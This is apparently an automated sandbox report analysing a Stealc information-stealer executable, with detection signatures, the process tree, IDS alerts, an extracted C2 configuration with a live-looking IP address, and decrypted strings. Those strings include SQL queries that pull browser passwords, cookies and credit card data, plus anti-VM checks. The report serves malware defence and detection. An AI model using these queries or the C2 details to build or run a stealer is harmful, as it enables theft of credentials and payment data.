Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ief722WreR.exe

Overview

General Information

Sample name:ief722WreR.exe
renamed because original name is a hash value
Original sample name:0b9795bc5978c62899793b157271e979.exe
Analysis ID:1572568
MD5:0b9795bc5978c62899793b157271e979
SHA1:d31405a2caf535d882fe873473df1badd7d5d028
SHA256:60af68dc8e940dae29691baa206ab9638bcff227b814c6cc33420edc0b3ac80b
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ief722WreR.exe (PID: 3076 cmdline: "C:\Users\user\Desktop\ief722WreR.exe" MD5: 0B9795BC5978C62899793B157271E979)
    • DADE.tmp.exe (PID: 564 cmdline: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" MD5: 017E73F6839555AA663A62235A81B433)
      • WerFault.exe (PID: 1252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x16a8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xc60:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          8.2.DADE.tmp.exe.9d0e67.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            8.2.DADE.tmp.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              8.3.DADE.tmp.exe.24e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                8.2.DADE.tmp.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  8.3.DADE.tmp.exe.24e0000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe, ParentCommandLine: "C:\Users\user\Desktop\ief722WreR.exe", ParentImage: C:\Users\user\Desktop\ief722WreR.exe, ParentProcessId: 3076, ParentProcessName: ief722WreR.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" , ProcessId: 564, ProcessName: DADE.tmp.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T17:42:14.485107+010020442431Malware Command and Control Activity Detected192.168.2.74970292.255.57.8980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T17:42:07.594849+010028032742Potentially Bad Traffic192.168.2.749699104.21.56.70443TCP
                    2024-12-10T17:42:09.220979+010028032742Potentially Bad Traffic192.168.2.749700176.113.115.1980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://92.255.57.89/45c616e921a794b8.phpQAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllllAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89Avira URL Cloud: Label: malware
                    Source: http://92.255.57.89/45c616e921a794b8.phpAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllexeAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/45c616e921a794b8.phpwininit.exeAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dlllAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/Avira URL Cloud: Label: malware
                    Source: http://92.255.57.89/2bAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/45c616e921a794b8.phpEAvira URL Cloud: Label: malware
                    Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllAvira URL Cloud: Label: malware
                    Source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exeReversingLabs: Detection: 47%
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeReversingLabs: Detection: 47%
                    Source: ief722WreR.exeReversingLabs: Detection: 44%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeJoe Sandbox ML: detected
                    Source: ief722WreR.exeJoe Sandbox ML: detected
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: INSERT_KEY_HERE
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 26
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 12
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 20
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 24
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetProcAddress
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: LoadLibraryA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: lstrcatA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: OpenEventA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateEventA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CloseHandle
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Sleep
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetUserDefaultLangID
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: VirtualAllocExNuma
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: VirtualFree
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetSystemInfo
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: VirtualAlloc
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HeapAlloc
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetComputerNameA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: lstrcpyA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetProcessHeap
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetCurrentProcess
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: lstrlenA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ExitProcess
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GlobalMemoryStatusEx
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetSystemTime
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SystemTimeToFileTime
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: advapi32.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: gdi32.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: user32.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: crypt32.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetUserNameA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateDCA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetDeviceCaps
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ReleaseDC
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CryptStringToBinaryA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sscanf
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: VMwareVMware
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HAL9TH
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: JohnDoe
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DISPLAY
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %hu/%hu/%hu
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: http://92.255.57.89
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: /45c616e921a794b8.php
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: /697b92cb4e247842/
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: default
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetEnvironmentVariableA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetFileAttributesA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HeapFree
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetFileSize
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GlobalSize
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateToolhelp32Snapshot
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: IsWow64Process
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Process32Next
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetLocalTime
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: FreeLibrary
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetTimeZoneInformation
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetSystemPowerStatus
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetVolumeInformationA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetWindowsDirectoryA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Process32First
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetLocaleInfoA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetUserDefaultLocaleName
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetModuleFileNameA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DeleteFileA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: FindNextFileA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: LocalFree
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: FindClose
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SetEnvironmentVariableA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: LocalAlloc
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetFileSizeEx
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ReadFile
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SetFilePointer
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: WriteFile
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateFileA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: FindFirstFileA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CopyFileA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: VirtualProtect
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetLastError
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: lstrcpynA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: MultiByteToWideChar
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GlobalFree
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: WideCharToMultiByte
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GlobalAlloc
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: OpenProcess
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: TerminateProcess
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetCurrentProcessId
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: gdiplus.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ole32.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: bcrypt.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: wininet.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: shlwapi.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: shell32.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: rstrtmgr.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateCompatibleBitmap
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SelectObject
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BitBlt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DeleteObject
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateCompatibleDC
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdipGetImageEncodersSize
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdipGetImageEncoders
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdiplusStartup
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdiplusShutdown
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdipSaveImageToStream
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdipDisposeImage
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GdipFree
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetHGlobalFromStream
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CreateStreamOnHGlobal
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CoUninitialize
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CoInitialize
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CoCreateInstance
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BCryptDecrypt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BCryptSetProperty
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BCryptDestroyKey
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetWindowRect
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetDesktopWindow
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetDC
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CloseWindow
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: wsprintfA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: EnumDisplayDevicesA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetKeyboardLayoutList
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CharToOemW
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: wsprintfW
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RegQueryValueExA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RegEnumKeyExA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RegOpenKeyExA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RegCloseKey
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RegEnumValueA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CryptBinaryToStringA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CryptUnprotectData
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SHGetFolderPathA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ShellExecuteExA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: InternetOpenUrlA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: InternetConnectA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: InternetCloseHandle
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HttpSendRequestA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HttpOpenRequestA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: InternetReadFile
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: InternetCrackUrlA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: StrCmpCA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: StrStrA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: StrCmpCW
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: PathMatchSpecA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: GetModuleFileNameExA
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RmStartSession
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RmRegisterResources
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RmGetList
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: RmEndSession
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_open
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_prepare_v2
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_step
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_column_text
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_finalize
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_close
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_column_bytes
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3_column_blob
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: encrypted_key
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: PATH
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: NSS_Init
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: NSS_Shutdown
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: PK11_GetInternalKeySlot
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: PK11_FreeSlot
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: PK11_Authenticate
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: PK11SDR_Decrypt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: C:\ProgramData\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: browser:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: profile:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: url:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: login:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: password:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Opera
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: OperaGX
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Network
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: cookies
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: .txt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: TRUE
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: FALSE
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: autofill
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: history
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: cc
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: name:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: month:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: year:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: card:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Cookies
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Login Data
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Web Data
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: History
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: logins.json
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: formSubmitURL
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: usernameField
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: encryptedUsername
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: encryptedPassword
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: guid
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: cookies.sqlite
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: formhistory.sqlite
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: places.sqlite
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: plugins
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Local Extension Settings
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Sync Extension Settings
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: IndexedDB
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Opera Stable
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Opera GX Stable
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: CURRENT
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: chrome-extension_
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: _0.indexeddb.leveldb
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Local State
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: profiles.ini
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: chrome
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: opera
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: firefox
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: wallets
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %08lX%04lX%lu
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ProductName
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: x32
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: x64
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DisplayName
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DisplayVersion
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Network Info:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - IP: IP?
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Country: ISO?
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: System Summary:
